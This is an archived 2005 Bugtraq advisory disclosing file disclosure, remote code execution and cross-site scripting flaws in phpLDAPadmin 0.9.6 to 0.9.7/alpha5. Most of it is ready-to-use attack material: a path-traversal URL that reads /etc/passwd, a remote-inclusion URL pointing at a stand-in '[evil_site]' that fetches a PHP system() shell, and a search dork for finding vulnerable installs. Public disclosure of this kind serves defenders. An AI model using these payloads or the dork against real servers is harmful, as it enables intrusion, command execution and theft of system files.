lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050829213504.1041.qmail@securityfocus.com>
Date: 29 Aug 2005 21:35:04 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions)
 system disclosure,


phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,
remote code execution, cross site scripting

software:
author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy,
anywhere-accessible, multi-language administration for your LDAP server

if unpatched and vulnerable, a user can see any file on target system, poc:

http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd

a user can also execute arbitrary php code and system commands:

http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif

where cmd.gif is a file like this:

<?php system('[some_command]); ?>  

also a user can craft a malicious url to include malicious client side code that
will be executed in the security contest of the victim browser

googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php 

rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta.it

original advisory: http://www.rgod.altervista.org/phpldap.html




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ